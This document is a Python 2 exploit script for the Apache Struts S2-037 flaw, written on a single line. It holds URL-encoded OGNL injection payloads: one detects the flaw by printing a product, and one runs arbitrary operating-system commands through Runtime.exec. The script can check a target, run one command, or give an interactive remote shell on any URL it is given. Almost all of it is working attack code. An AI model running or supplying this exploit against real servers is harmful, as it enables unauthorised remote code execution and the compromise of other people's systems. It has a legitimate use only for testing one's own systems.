#!/usr/bin/env python # -*- coding:utf-8 -*- import requests import argparse # PoC s2037_poc = "/(%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)%3F((%23writ%3D(%23attr%5B%23parameters.com%5B0%5D%5D).getWriter())%2C%23writ.println(3345*2356))%3Aindex.xhtml?com=com.opensymphony.xwork2.dispatcher.HttpServletResponse" # CommandExP cmd_exp = "/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=ShowMeCommand" ''' headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'Cookie': 'JSESSIONID=75C9ED1CD9345875BC5328D73DC76812', 'referer': 'http://www.baidu.com/', } ''' def verity(url): try: poc_url = url+s2037_poc print "."*len(url) print "[checking] " + url print "."*len(url) s = requests.session() res = s.post(poc_url, timeout=4) if res.status_code == 200 and "7880820" == res.content.rstrip() : return True else: return False except Exception, e: print "Failed to connection target, try again.." return False def cmdTool(exp_url): get_url_exp = exp_url + cmd_exp while True: comm = raw_input("~$ ") if comm == "q": exit(0) temp_exp = get_url_exp.replace("ShowMeCommand", comm) try: print "="*80 print "[Result]" print "_"*80 #r = requests.get(temp_exp, headers=headers, timeout=5) r = requests.get(temp_exp, timeout=5) resp = r.text.encode("utf-8") print resp print "="*80 except: print "error,try again.." def ExecOneCmd(exp_url , command): try: get_url_exp = exp_url + cmd_exp temp_exp = get_url_exp.replace("ShowMeCommand", command) print "="*80 print "[Result]" print "_"*80 #r = requests.get(temp_exp, headers=headers, timeout=5) r = requests.get(temp_exp, timeout=5) resp = r.text.encode("utf-8") print resp print "="*80 return True except: return False if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u', help='the target url.', required=True) parser.add_argument('-check', help='yes|no', required=False) parser.add_argument('-shell', help='get os shell (yes|no)', required=False) parser.add_argument('-command', help='yes|no', required=False) args = parser.parse_args() args_dict = args.__dict__ try: #print banner if not (args_dict['u'] == None): if not (args_dict['check'] == None): url = args_dict['u'] if args_dict['check'] == "yes": isvuln = verity(url) if isvuln: print "{url} is vulnerable S2-037.".format(url=url) exit(0) else: print "{url} is no vulnerable..".format(url=url) exit(0) if not (args_dict['shell'] == None): if args_dict['shell'] == "yes": url = args_dict['u'] cmdTool(url) exit(0) if not (args_dict['command'] == None): url = args_dict['u'] command = args_dict['command'] ExecOneCmd(url, command) exit(0) print parser.print_usage() except Exception,e: print parser.print_usage() exit(-1)